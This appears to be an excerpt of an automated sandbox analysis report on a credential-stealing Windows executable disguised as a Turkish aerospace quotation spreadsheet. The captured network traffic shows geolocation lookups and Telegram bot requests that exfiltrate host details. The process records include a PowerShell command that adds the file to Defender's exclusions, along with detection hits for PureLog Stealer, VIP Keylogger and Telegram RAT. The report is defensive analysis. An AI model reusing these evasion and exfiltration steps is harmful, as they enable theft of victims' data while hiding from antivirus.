2025-01-14 13:14:10 UTC	857	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:10 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175239 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=huxA3VsKq1kr%2BC9xLoLXdXsfDflk9I3olbWKrJTmIeGuxO3mi8pwUoS%2FanYpa9U8hmy1xs65ifIs7XuDhozcOQgcm%2Bc7wEs3OewBvgJbi%2FOk6jUOUhjuOvIYfwlNF5dyk4ntvmPJ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de335fc42c323-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1505&min_rtt=1504&rtt_var=566&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1931216&cwnd=214&unsent_bytes=0&cid=c0d5e6b7a3c5d2a6&ts=133&x=0"
2025-01-14 13:14:10 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	49779	104.21.48.1	443	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:11 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 13:14:11 UTC	849	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:11 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175240 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H5Z5t3HesDEjNon1GWtZ0b00zXvs2s4jNPtVh6oNNYp7a5J5W5blW3x8PlRCLCMAnrodhzX4FwdyUBwOPIz8PWkPVGcJR2EYckvhS2n4KDo6doWQfXW4bPVDswXpbDesb7V3lQ0V"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de33bd8d9c323-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1481&min_rtt=1479&rtt_var=560&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1944074&cwnd=214&unsent_bytes=0&cid=3782182de5270f3e&ts=154&x=0"
2025-01-14 13:14:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	49784	104.21.48.1	443	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:11 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 13:14:11 UTC	853	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:11 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175240 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tDRozIL8XTOXhhzxsxJbOdFSsqjJ1%2BMbjtredUfLD68FJZXLhlXGZ4OxRAurz7%2BkfrtPgkXuPSJZ6eMTTTFBbLzSQN5YJgkbStesBLyeMhPlGUQpLI2ZRZdAMbcRd7p3TcUnrZrY"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de33e3ffb43be-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1626&rtt_var=613&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1781574&cwnd=229&unsent_bytes=0&cid=2f7e637908b9d9b8&ts=157&x=0"
2025-01-14 13:14:11 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	49793	104.21.48.1	443	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:12 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 13:14:12 UTC	861	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:12 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175241 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0iq4biSe3bmJNgaBsepcQh%2BumA9STqtLgOrMK0FAyJTUSYhTeitjoiQyGfFErE7IWppVC4ylA2hW%2F%2BqQ8mWPWUqJRFJgIRJfi%2By6Pomk02t4p0vYgwxv9IUPvLgyA3yM%2Bpd%2Fnm32"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de343eada8c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1839&min_rtt=1834&rtt_var=698&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1557333&cwnd=238&unsent_bytes=0&cid=c92db9a0248bbaf8&ts=144&x=0"
2025-01-14 13:14:12 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	49794	104.21.48.1	443	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:12 UTC	85	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2025-01-14 13:14:12 UTC	857	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:12 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175241 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dxRUMtu3dMEsSKbKVrQ6wAdd19Expe9YLaEzEezoOwihp4eSCmDI4IFOmtY4VuhM0rTEGQdlOvhUJbA9J3d1qnT2kdrHJjGNswevnTv%2F6TAX9Qy0KU%2FK%2B8Gt%2Bq7ojzHduFeiPuou"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de346589342e9-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1767&min_rtt=1767&rtt_var=663&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1652518&cwnd=241&unsent_bytes=0&cid=f01f356ee9c66ecc&ts=139&x=0"
2025-01-14 13:14:12 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	49799	149.154.167.220	443	5728	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:13 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2014/01/2025%20/%2020:18:59%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-14 13:14:13 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 14 Jan 2025 13:14:13 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-14 13:14:13 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	49808	104.21.48.1	443	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:14 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 13:14:14 UTC	861	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:14 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175243 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=52nwIzePJu9xmBLEYs7dRoKcirAdAFEIXNy%2FAu0aN2EqPpzSheCTPXkS61g4Qpx50%2F6lyR3C6leFEN5W%2BTDtXbsO6NH2U3IYyIaus%2BKVSjjzwF9FxTxWitv%2F5765EpAyoDp%2F8rEm"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de34eae99c461-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1621&min_rtt=1620&rtt_var=610&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1791411&cwnd=232&unsent_bytes=0&cid=f11bf43406fe63db&ts=155&x=0"
2025-01-14 13:14:14 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.6	49822	104.21.48.1	443	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:15 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 13:14:15 UTC	865	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:15 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175244 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ngJ886x4MZJ%2BypGCuIIHsG6NRJ9%2BtJULlxP4WjbC2zzKrqiklDG1XX19yuhi%2F7uN63WMR%2BXbox%2BSt8ei62nDhPds7Nfsvl4J10NH9Z0amsc%2BDsfbFRhhVLCRXML%2FbiEVJyzOfPV%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de356ce13c323-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1504&min_rtt=1503&rtt_var=567&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1924851&cwnd=214&unsent_bytes=0&cid=f79b73a97d44e874&ts=156&x=0"
2025-01-14 13:14:15 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.6	49831	104.21.48.1	443	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:16 UTC	61	OUT	GET /xml/8.46.123.189 HTTP/1.1 Host: reallyfreegeoip.org
2025-01-14 13:14:16 UTC	865	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 13:14:16 GMT Content-Type: text/xml Content-Length: 362 Connection: close Age: 2175245 Cache-Control: max-age=31536000 cf-cache-status: HIT last-modified: Fri, 20 Dec 2024 09:00:10 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AWV8dwNuwy2T98%2Bx2bCu%2BgjcJx0PubBbdbuL5vxpZF3zBL%2BrKOIbbjUnGvIXU9JMQ%2B0b91OnP%2BeXs6SfLL%2BHuwz86ltmC4ANe%2Bo2bJLgA5t5waSBfeHvNFHxN7eUx9Mvo1HI%2BHUi"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 901de35eeca58c15-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1768&min_rtt=1761&rtt_var=676&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1601755&cwnd=238&unsent_bytes=0&cid=0b878050ec7a7118&ts=138&x=0"
2025-01-14 13:14:16 UTC	362	IN	Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.6	49836	149.154.167.220	443	5560	C:\Users\user\AppData\Roaming\xSjByRHuwGV.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 13:14:17 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:405464%0D%0ADate%20and%20Time:%2014/01/2025%20/%2020:48:43%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20405464%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2025-01-14 13:14:17 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 14 Jan 2025 13:14:17 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-14 13:14:17 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Analysis Process: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exePID: 2248, Parent PID: 4004

General

Target ID:	0
Start time:	08:13:56
Start date:	14/01/2025
Path:	C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Imagebase:	0xcf0000
File size:	757'760 bytes
MD5 hash:	C9C012589D85D3610541A5C7377D5AC9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2183125606.0000000004109000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2186688831.0000000005B90000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.2182151240.00000000031BA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000000.00000002.2183125606.000000000427C000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	08:13:57
Start date:	14/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe"
Imagebase:	0xe50000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	08:13:57
Start date:	14/01/2025
Path:	C:\Windows\System32\conhost.exe
